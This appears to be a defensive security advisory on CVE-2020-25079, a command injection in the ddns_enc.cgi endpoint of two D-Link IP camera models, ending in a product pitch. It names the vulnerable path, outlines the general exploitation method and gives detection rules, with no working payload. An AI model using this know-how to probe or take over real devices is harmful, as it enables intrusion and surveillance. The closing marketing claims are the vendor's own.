What happened

CISA added CVE-2020-25079 to the Known Exploited Vulnerabilities (KEV) catalog, flagging active exploitation against D-Link DCS-2530L and DCS-2670L IP cameras CISA KEV. The vulnerability is a command injection in cgi-bin/ddns_enc.cgi, enabling attackers to execute arbitrary system commands through crafted input CISA KEV. The issue maps to OS command injection (CWE-77) per the coordinated CVE record NVD CVE-2020-25079.

CISA’s entry states the impacted products could be end-of-life (EoL) or end-of-service (EoS), and advises users to discontinue utilization if mitigations are unavailable CISA KEV. The CVE was added to KEV on 2025-08-05, with a federal remediation due date of 2025-08-26 under KEV/BOD 22-01 guidance CISA KEV. The affected hardware and CVE details are confirmed in the public records for D-Link and this identifier MITRE CVE-2020-25079.

Why it matters

A KEV listing means exploitation has been observed in the wild and remediation is mandatory for U.S. federal civilian agencies under BOD 22-01 timelines CISA KEV. For enterprises, a command injection on a networked camera allows device takeover, lateral movement footholds, and covert surveillance operations at the edge NVD CVE-2020-25079. The EoL/EoS posture raises operational risk: if vendor fixes don’t exist, the only safe move is to retire or isolate the hardware, as CISA explicitly advises CISA KEV.

CWE-77 class flaws often yield direct shell execution via malformed parameters handed to system interpreters, which is reliably automatable and attractive for commodity botnets and targeted actors alike NVD CVE-2020-25079. When the target is a camera, persistence and stealth are easier: traffic looks routine and local monitoring is scarce, making these devices high-ROI persistence points CISA KEV.

Technical detail

Per CISA, the vulnerable component is the web-accessible script cgi-bin/ddns_enc.cgi on the DCS-2530L and DCS-2670L CISA KEV. The vulnerability is categorized as command injection (CWE-77), indicating attacker-controlled input is passed to an OS command execution context without proper sanitization NVD CVE-2020-25079. In practice, exploitation typically involves an HTTP request to the CGI endpoint with embedded metacharacters or payloads that break out of expected parameters and execute arbitrary commands NVD CVE-2020-25079.

Operationally, successful exploitation can grant:

• Remote command execution under the device’s web service context, enabling further tooling deployment NVD CVE-2020-25079.
• Device reconfiguration, data exfiltration (video/credentials), or use as a pivot into internal networks CISA KEV.
• Durable persistence if the attacker scripts re-entry via the same CGI path or adds startup hooks, a common pattern with CWE-77 exploitation on embedded Linux targets NVD CVE-2020-25079.

Indicators you can hunt for include requests referencing “/cgi-bin/ddns_enc.cgi” in HTTP access logs or proxy telemetry, unusual command-like strings in query parameters to that path, and anomalous outbound sessions from camera IPs immediately after such requests CISA KEV. Treat any evidence of interaction with the vulnerable CGI on these models as high-signal given the KEV status CISA KEV.

Defense

• Mandatory action: follow CISA guidance to apply vendor mitigations where available, or discontinue use if none exist, especially for EoL/EoS units CISA KEV.
• Federal agencies: comply with BOD 22-01 timelines in the KEV entry; document and track exceptions only where strictly necessary CISA KEV.
• Network isolation: until decommission, place affected cameras on dedicated VLANs with deny-by-default ACLs; block inbound access to /cgi-bin/ddns_enc.cgi from untrusted networks CISA KEV.
• Detection: add signatures for HTTP requests to “/cgi-bin/ddns_enc.cgi”; alert on any occurrence targeting DCS-2530L/DCS-2670L addresses CISA KEV. Monitor for sudden process activity and new outbound connections from these devices following CGI hits NVD CVE-2020-25079.
• Asset control: inventory and tag all DCS-2530L/DCS-2670L units; plan hardware refresh if patches aren’t available, per CISA’s discontinue-use directive for EoL/EoS CISA KEV.

If you find a compromised device, treat it as untrusted infrastructure: capture traffic for forensics, rotate any credentials the camera touched, and replace the hardware if remediation cannot eliminate the backdoor path CISA KEV.

Lyrie Verdict

This is a commodity-friendly, machine-speed target: a stable CGI path, deterministic payloads, and likely broad internet probing. Lyrie’s autonomous sensors continuously fingerprint exposed CGI surfaces, generate safe probes for known KEV paths like /cgi-bin/ddns_enc.cgi, and correlate responses with model fingerprints to flag exploitable posture in seconds CISA KEV. On live traffic, Lyrie detects exploitation patterns for CWE-77 (command metacharacters, shell-spawn behaviors) and can quarantine flows or isolate device MACs automatically, without waiting for human reaction time NVD CVE-2020-25079. For EoL/EoS devices where patching is off the table, Lyrie enforces network containment policies and continuous exploit-attempt suppression — practical anti-rogue-AI defense at the edge when adversaries script and iterate faster than human SOCs can respond CISA KEV.